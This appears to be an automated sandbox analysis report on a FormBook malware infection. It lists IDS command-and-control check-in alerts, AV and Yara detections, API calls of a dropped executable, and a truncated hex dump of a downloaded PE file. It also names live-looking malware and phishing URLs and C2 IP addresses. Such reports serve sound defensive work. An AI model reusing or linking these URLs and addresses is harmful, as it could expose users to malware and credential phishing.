| 2025-04-15T17:21:44.440969+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 156.237.132.252 | 80 | TCP |
| 2025-04-15T17:21:52.908309+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 159.198.64.72 | 80 | TCP |
| 2025-04-15T17:21:55.784174+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 159.198.64.72 | 80 | TCP |
| 2025-04-15T17:21:58.561192+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 159.198.64.72 | 80 | TCP |
| 2025-04-15T17:22:07.061025+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 104.21.96.1 | 80 | TCP |
| 2025-04-15T17:22:09.697420+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 104.21.96.1 | 80 | TCP |
| 2025-04-15T17:22:12.382549+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 104.21.96.1 | 80 | TCP |
| 2025-04-15T17:22:28.800984+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 199.59.243.160 | 80 | TCP |
| 2025-04-15T17:22:31.455832+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 199.59.243.160 | 80 | TCP |
| 2025-04-15T17:22:34.151778+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 199.59.243.160 | 80 | TCP |
| 2025-04-15T17:22:42.384012+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 13.248.169.48 | 80 | TCP |
| 2025-04-15T17:22:45.052134+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 13.248.169.48 | 80 | TCP |
| 2025-04-15T17:22:47.719965+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 13.248.169.48 | 80 | TCP |
| 2025-04-15T17:22:58.133769+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 45.130.41.113 | 80 | TCP |
| 2025-04-15T17:23:00.399159+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 45.130.41.113 | 80 | TCP |
| 2025-04-15T17:23:03.183470+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 45.130.41.113 | 80 | TCP |
| 2025-04-15T17:23:12.945399+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49761 | 18.139.62.226 | 80 | TCP |
| 2025-04-15T17:23:15.730176+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49762 | 18.139.62.226 | 80 | TCP |
| 2025-04-15T17:23:18.595414+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 18.139.62.226 | 80 | TCP |
| 2025-04-15T17:23:27.232281+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 172.67.217.184 | 80 | TCP |
| 2025-04-15T17:23:29.880358+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 172.67.217.184 | 80 | TCP |
| 2025-04-15T17:23:32.562621+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49767 | 172.67.217.184 | 80 | TCP |
| 2025-04-15T17:23:41.967467+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49769 | 13.248.169.48 | 80 | TCP |
| 2025-04-15T17:23:45.649381+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49770 | 13.248.169.48 | 80 | TCP |
| 2025-04-15T17:23:49.323988+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 13.248.169.48 | 80 | TCP |


                  AV Detection

Source: http://www.anyang-590303492.click/6npl/?UV90oJV=/JYiv5NhO0tELAK8hKXRL6yPw09VuQMvi5BuLmngF2OWbpzZErtHeLuo5nDg79GzI2QTdod40q0r+J2P58yW7/6plb4OcALkiS6guO79bLlT8DxgdN065to=&LVsla=JHrxl4t | Avira URL Cloud: Label: malware
Source: http://www.worrr37.yachts/1imc/?UV90oJV=GkZ+7lZN5ZbT6rZArZ+XuW2LS/GQFqiR2eAXidPe90Y9rybDHdv8GRqVb6FfMfkpXSVDgNv2zaXT/X0CpEMHyOeTTSnvzCMVpGnq9juhbcH3k1fZ/Ho823c=&LVsla=JHrxl4t | Avira URL Cloud: Label: phishing
Source: http://www.soportemx-findmy.click/ma0g/ | Avira URL Cloud: Label: phishing
Source: http://www.play-venom-rush.xyz | Avira URL Cloud: Label: malware
Source: http://www.play-venom-rush.xyz/pji1/?LVsla=JHrxl4t&UV90oJV=oPSxN0d9Y70P2riykwj378jDK4dA5CWov285JwcUKQzMmNdemng31QxGRPhWi1n81NmvKhZ2Lkv1YeaEtRyFRChPj4DjhNDfDC0AWPeNp3jL6YRDWHxMF/w= | Avira URL Cloud: Label: malware
Source: http://www.soportemx-findmy.click/ma0g?gp=1&js=1&uuid=1744730452.0012257657&other_args=eyJ1cmkiOiAiL | Avira URL Cloud: Label: phishing
Source: http://www.play-venom-rush.xyz/pji1/ | Avira URL Cloud: Label: malware
Source: http://www.soportemx-findmy.click/ma0g/?LVsla=JHrxl4t&UV90oJV=H2S90RmziCMvLCuK8yTaL3f2umhuNHnT+UjWuF5QkK5TSoHa4lhKP7xjBIvwYHsxlglzK0GWG6GIcHietPpqxtVwo9BPmEy9xm5LwWe49kMrhYdXnmUTf+U= | Avira URL Cloud: Label: phishing
Source: http://www.anyang-590303492.click/6npl/ | Avira URL Cloud: Label: malware
Source: http://www70.soportemx-findmy.click/ | Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\igcc[1].exe | ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\igcc.exe | ReversingLabs: Detection: 41%
Source: njo.hta | Virustotal: Detection: 40%
Source: njo.hta | ReversingLabs: Detection: 27%
Source: Yara match | File source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.3663915117.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3664272191.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1614478454.0000000007480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1609453239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3675591492.0000000006A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3664383512.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1611189571.00000000047A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3666208376.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Neural Call Log Analysis: 99.4%
                  Source: Binary string: ATBroker.pdb source: svchost.exe, 0000000D.00000003.1576499115.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1576388151.000000000341B000.00000004.00000020.00020000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000003.1681787984.0000000000548000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: igcc.exe, 0000000C.00000003.1362520045.0000000004020000.00000004.00001000.00020000.00000000.sdmp, igcc.exe, 0000000C.00000003.1360820679.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1507905161.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1509975834.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.00000000052CE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1612443700.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1609657209.0000000004DD2000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.0000000005130000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: igcc.exe, 0000000C.00000003.1362520045.0000000004020000.00000004.00001000.00020000.00000000.sdmp, igcc.exe, 0000000C.00000003.1360820679.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000D.00000002.1610420128.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1507905161.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1509975834.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.00000000052CE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1612443700.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1609657209.0000000004DD2000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.0000000005130000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: q7C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.pdb source: powershell.exe, 00000003.00000002.1374616824.0000000004991000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 0000000D.00000003.1576499115.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1576388151.000000000341B000.00000004.00000020.00020000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000003.1681787984.0000000000548000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WRNKS5Hlc0y.exe, 0000000F.00000002.3664843128.000000000062F000.00000002.00000001.01000000.0000000A.sdmp
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007445A GetFileAttributesW,FindFirstFileW,FindClose,12_2_0007445A
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007C6D1 FindFirstFileW,FindClose,12_2_0007C6D1
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_0007C75C
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0007EF95
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0007F0F2
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0007F3F3
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_000737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000737EF
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_00073B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00073B12
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0007BCBC
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe Code function: 4x nop then pop edi 15_2_06A3CCBD
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe Code function: 4x nop then xor eax, eax 15_2_06A424FB
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe Code function: 4x nop then pop edi 15_2_06A4DAB8

                  Networking

                  Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 172.245.208.21:80 -> 192.168.2.4:49721
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49723 -> 168.76.121.210:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49726 -> 173.255.194.134:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49734 -> 103.105.23.222:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49730 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 159.198.64.72:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49725 -> 173.255.194.134:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 103.105.23.222:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49733 -> 103.105.23.222:80
                  Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 172.245.208.21:80 -> 192.168.2.4:49721
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 156.237.132.252:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 156.237.132.252:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49731 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 104.21.96.1:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49728 -> 173.255.194.134:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49748 -> 104.21.96.1:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49764 -> 18.139.62.226:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49761 -> 18.139.62.226:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49753 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 172.67.217.184:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49760 -> 45.130.41.113:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 45.130.41.113:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 104.21.96.1:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 18.139.62.226:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 159.198.64.72:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 156.237.132.252:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 159.198.64.72:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49744 -> 159.198.64.72:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49732 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 104.21.96.1:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49727 -> 173.255.194.134:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 18.139.62.226:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49752 -> 199.59.243.160:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 172.67.217.184:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49740 -> 156.237.132.252:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49756 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49729 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 45.130.41.113:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49768 -> 172.67.217.184:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 199.59.243.160:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 199.59.243.160:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49735 -> 103.105.23.222:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49749 -> 199.59.243.160:80
                  Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49772 -> 13.248.169.48:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 172.67.217.184:80
                  Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 45.130.41.113:80
                  Source: DNS query: www.vczuahand.xyz
                  Source: DNS query: www.855696a.xyz
                  Source: DNS query: www.play-venom-rush.xyz
                  Source: DNS query: www.jicode.xyz
                  Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Apr 2025 15:19:39 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 15 Apr 2025 05:37:48 GMTETag: "122c00-632ca91a2bb10"Accept-Ranges: bytesContent-Length: 1190912Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 99 f0 fd 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 4a 09 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 12 00 00 04 00 00 23 7b 12 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 14 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 12 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 
00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 a3 05 00 00 70 0c 00 00 a4 05 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 20 12 00 00 72 00 00 00 ba 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: Joe Sandbox View IP Address: 172.245.208.21 172.245.208.21
                  Source: Joe Sandbox View IP Address: 172.67.217.184 172.67.217.184
                  Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
